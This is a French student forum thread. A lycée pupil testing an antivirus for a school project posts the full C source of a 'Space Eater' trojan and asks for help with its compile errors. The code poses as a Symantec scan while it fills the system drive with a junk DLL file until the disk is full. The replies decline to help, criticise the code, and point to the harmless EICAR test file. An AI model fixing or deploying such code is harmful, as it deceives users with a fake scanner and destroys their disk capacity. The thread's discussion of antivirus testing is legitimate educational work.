Problème pour mon TPE de première [C]
Répondre à la discussion
Affichage des résultats 1 à 14 sur 14

Problème pour mon TPE de première [C]



  1. #1
    invite9f6fa001

    Problème pour mon TPE de première [C]


    ------

    Bonjour à tous,

    Mon TPE consiste a montrer comment se défendre efficacement contre des attaques informatique. Dans mon TPE je dois réaliser une experience et avec mon groupe on a décidé de mettre à l’épreuve notre antivirus afin d'ensuite enchaîner sur les explications. Donc on doit coder un virus sans gravité que l'antivirus peut détecter. J'en ai trouvé un mais il y a des erreurs dedans, or le programmer est en C et je ne maîtrise pas ce langage.

    Voici le programme que j'utilise et que je compile sur Dev C/C++

    /* SPACE EATER TROJAN BY SRIKANTH. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/

    #include<stdio.h>
    #include<conio.h>
    #include<dos.h>
    #include<stdlib.h>
    FILE *a,*t,*b;
    int r,status,vir_count;
    double i;
    char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

    void eatspace(void);
    void findroot(void);
    void showstatus(void);
    void draw(void);
    void accept(void);

    int main()
    {
    draw();
    accept();
    int textcolor(int WHITE);
    draw();
    gotoxy(12,8);
    cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
    sleep(3);
    gotoxy(12,8);
    delline();
    cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
    getch();
    gotoxy(12,8);
    delline();
    findroot();
    }

    void accept()
    {
    textcolor(LIGHTRED);
    gotoxy(1,8);
    cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rI F YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

    if((choice=getch())!=13)
    exit(0);
    }

    void draw()
    {
    clrscr();
    textcolor(WHITE);
    gotoxy(12,2);
    cputs("*********************** ****************************** ***");
    gotoxy(12,6);
    cputs("*********************** ****************************** ***");
    gotoxy(12,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(67,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(14,4);
    cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
    }

    void findroot()
    {
    t=fopen("C:\\windows\\explorer .exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    textcolor(WHITE);
    a=fopen("C:\\windows\\system32 \\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("C:\\windows\\system32 \\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("D:\\windows\\explorer .exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("D:\\windows\\system32 \\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("D:\\windows\\system32 \\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("E:\\windows\\explorer .exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("E:\\windows\\system32 \\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("E:\\windows\\system32 \\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("F:\\windows\\explorer .exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("F:\\windows\\system32 \\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("F:\\windows\\system32 \\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    if(t==NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
    getch();
    exit(1);
    }
    exit(1);
    }

    void eatspace()
    {
    textcolor(LIGHTRED);
    gotoxy(12,16);
    cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
    textcolor(WHITE);
    gotoxy(12,18);
    while(1)
    {
    for(r=1;r<4;r++)
    {
    for(i=1;i<900000;i++)
    {
    status=fputs(ch,b);
    if(status==EOF)
    {
    textcolor(WHITE);
    vir_count=random(120);
    draw();
    gotoxy(12,8);
    cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
    gotoxy(12,10);
    cprintf("PRESS ANY KEY TO CLOSE...");
    getch();
    break;
    }
    }
    cputs(".");
    if(status==EOF) break;
    }
    if(status==EOF) break;
    }
    exit(0);
    }

    void showstatus()
    {
    gotoxy(12,8);
    cputs("SCANNING THE SYSTEM FOR THREATS");
    gotoxy(12,10);
    cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
    gotoxy(12,13);
    cputs("SCAN IN PROGRESS. PLEASE WAIT...");
    }

    Et voici les erreurs que je trouve :

    C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C In function 'int main()':
    24 12 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'gotoxy' was not declared in this scope
    26 8 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'sleep' was not declared in this scope
    28 9 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'delline' was not declared in this scope
    C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C In function 'void accept()':
    C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C In function 'void accept()':
    38 11 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'LIGHTRED' was not declared in this scope
    38 19 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'textcolor' was not declared in this scope
    39 11 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'gotoxy' was not declared in this scope
    C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C In function 'void draw()':
    48 8 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'clrscr' was not declared in this scope
    49 11 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'WHITE' was not declared in this scope
    49 16 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'textcolor' was not declared in this scope
    50 12 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'gotoxy' was not declared in this scope
    C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C In function 'void findroot()':
    68 11 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'WHITE' was not declared in this scope
    68 16 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'textcolor' was not declared in this scope
    72 11 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'LIGHTRED' was not declared in this scope
    73 12 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'gotoxy' was not declared in this scope
    92 19 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'textcolor' was not declared in this scope
    93 12 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'gotoxy' was not declared in this scope
    112 11 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'LIGHTRED' was not declared in this scope
    112 19 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'textcolor' was not declared in this scope
    113 12 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'gotoxy' was not declared in this scope
    132 11 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'LIGHTRED' was not declared in this scope
    132 19 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'textcolor' was not declared in this scope
    133 12 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'gotoxy' was not declared in this scope
    147 11 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'LIGHTRED' was not declared in this scope
    147 19 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'textcolor' was not declared in this scope
    147 19 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'textcolor' was not declared in this scope
    148 12 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'gotoxy' was not declared in this scope
    C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C In function 'void eatspace()':
    158 11 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'LIGHTRED' was not declared in this scope
    158 19 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'textcolor' was not declared in this scope
    159 13 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'gotoxy' was not declared in this scope
    161 11 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'WHITE' was not declared in this scope
    173 21 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'random' was not declared in this scope
    C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C In function 'void showstatus()':
    193 12 C:\Users\Valentin\Desktop\Nouv eau dossier\SpaceEater.C [Error] 'gotoxy' was not declared in this scope

    Voilà, j'éspére que vous pourrez m'aider

    Merci d'avance

    -----

  2. #2
    Jack
    Modérateur

    Re : Problème pour mon TPE de première [C]

    Ca serait bien d'indenter ton code et de le placer entre des balises code, parce qu'en l'état ça ne donne vraiment pas envie de le lire.

    or le programmer est en C et je ne maîtrise pas ce langage.
    Ca risque d'être compliqué pour toi.

    Lorsqu'il y a des erreurs, il faut toujours commencer par corriger la 1ère, les autres pouvant être la conséquence de celle-ci:
    'gotoxy' was not declared in this scope
    Ca veut dire que le compilateur ne connait pas la fonction gotoXY.
    Cette fonction était courante dans les compilateurs BORLAND des années 80. On voit aussi que le programme cherche à ouvrir une DLL: spceshot.dll. Est-ce que tu la possèdes.

  3. #3
    invite9f6fa001

    Re : Problème pour mon TPE de première [C]

    C'est un des problèmes que j'ai eu. J'ai essayé de nombreux code avant mais le problème est qu'ils ont des fonction que j'ai pas dans mes compilateurs. Pour le .dll non je ne l'ai pas, il n'était pas en téléchargement car oui ce n'est pas mon code. Je suis qu'en première et en prenant ce sujet on ne penser pas avoir a coder. Mais là actuellement, désolé du langage mais je suis vachement dans la merde, j'ai réussi a faire un truc de phishing mais il me faut trouver un virus pour que l'antivirus le détecte. Je vais pas mentir je n'y connais vraiment pas grand chose en code mais à la base on devait pas faire ça donc je sais pas si vous pouvez m'aider mais voilà tout ce que je peut vous expliquer sur mon problème.

  4. #4
    invite29cafaf3

    Re : Problème pour mon TPE de première [C]

    TPE de première quoi ?
    Parce que enfin, on reste un peu rêveur si c'est une année "informatique".
    Le code est illisible, vous faites du "pishing" et à la base vous ne deviez pas faire cela ???
    Que deviez vous faire à la base ?
    Je veux bien que les profs soient "cons" (c'est la routine, par définition les profs sont cons, crétins, obtus, incompétents, nuls et j'en passe ..) mais enfin, votre TPE, il a une base et plutôt que de nous dire ce qu'il ne fallait pas faire, il serait peut être préférable de nous dire ce qui vous était demandé de faire.

  5. A voir en vidéo sur Futura
  6. #5
    Jack
    Modérateur

    Re : Problème pour mon TPE de première [C]

    En l'état, je ne vois pas trop ce que je peux faire pour toi.

  7. #6
    invite9f6fa001

    Re : Problème pour mon TPE de première [C]

    On est en Première SI est on devait juste expliquer le fonctionnement de l'antivirus et cela en introduisant des compétences de SI donc en gros il fallait faire un algorigramme de comment fonctionne un antivirus et du jour au lendemain on nous demande de mettre à l'épreuve un antivirus et avant cela d'expliquer comment on peut récupérer des données et le montrer d'où le phishing. Donc moi je me suis dis je vais prendre la partie avec les algos et je me retrouve a devoir trouver un virus pour faire mon expérience, il me faut juste un truc qui me permettent de déclencher l'antivirus. Donc en résumé il me faut un virus détectable par mon antivirus afin de pouvoir lancé mon explication avec mon algorigramme.

  8. #7
    invite9f6fa001

    Re : Problème pour mon TPE de première [C]

    Tout est bon dans notre TPE sauf cette foutu expérience

  9. #8
    Jack
    Modérateur

    Re : Problème pour mon TPE de première [C]

    Je ne vois pas le rapport entre virus et phishing.

    il fallait faire un algorigramme de comment fonctionne un antivirus et du jour au lendemain on nous demande de mettre à l'épreuve un antivirus
    Le côté expérimental me semble normal. C'est bien beau de récupérer des infos sur le net. Encore faut-il les mettre à l'épreuve de la réalité.

  10. #9
    invite29cafaf3

    Re : Problème pour mon TPE de première [C]

    Pour ce qui est du programme .. je préfère me taire !

  11. #10
    invite29cafaf3

    Re : Problème pour mon TPE de première [C]

    Pour un "algorigramme" ... aussi !

  12. #11
    invite9f6fa001

    Re : Problème pour mon TPE de première [C]

    Bon j'ai compris je vais me débrouiller et passer encore une nuit blanche merci à vous

  13. #12
    pm42

    Re : Problème pour mon TPE de première [C]

    Citation Envoyé par pelkin Voir le message
    Pour ce qui est du programme .. je préfère me taire !
    Oui, c'est absolument n'importe quoi. Et c'est tout sauf un trojan ni une analyse...
    Je ne vois pas trop l'intérêt de partir de cela.

    Un simple programme qui parcourt les fichiers disque à la recherche d'une signature de virus de quelques dizaines d'octets serait plus intéressant d'un point de vue éducatif.

  14. #13
    inviteb9f49292

    Re : Problème pour mon TPE de première [C]

    Citation Envoyé par Anton-Wojtik Voir le message
    Bon j'ai compris je vais me débrouiller et passer encore une nuit blanche merci à vous
    Le problème est que rien n'est clair, on passe allègrement de virus à trojan en passant par du phishing... avec un programme d'exemple qui n'a pas grand chose à voir avec un virus et qui date de la préhistoire. Il faut un minimum de culture sur ces notions pour pouvoir savoir où on va, et éventuellement poser des questions compréhensibles, parce que là avec toute la meilleur volonté du monde c'est difficile...

  15. #14
    Stan_94

    Re : Problème pour mon TPE de première [C]

    Bonjour,
    c'est effectivement assez confus tout ça...

    Ceci dit, pour tester un antivirus (= voir si il réagit à la présence d'une menace),
    il y a le test EICAR à faire...
    Voir là par exemple :
    http://www.pcastuces.com/pratique/wi...tantivirus.htm

    Bon courage !

Discussions similaires

  1. Redoubler une première ES pour une première S.
    Par invitef18c34c6 dans le forum Orientation avant le BAC
    Réponses: 4
    Dernier message: 31/01/2014, 18h31
  2. Probleme sur un DM ! Première S
    Par invite7572c6cc dans le forum Mathématiques du collège et du lycée
    Réponses: 4
    Dernier message: 16/09/2011, 15h55
  3. Probleme premiere S
    Par invite8ea0764b dans le forum Orientation avant le BAC
    Réponses: 2
    Dernier message: 26/02/2011, 13h39
  4. problème en première S SI
    Par invite3a441012 dans le forum Orientation avant le BAC
    Réponses: 6
    Dernier message: 17/11/2007, 10h36
  5. probleme exo première S
    Par invite7164e105 dans le forum Mathématiques du supérieur
    Réponses: 26
    Dernier message: 25/09/2005, 12h38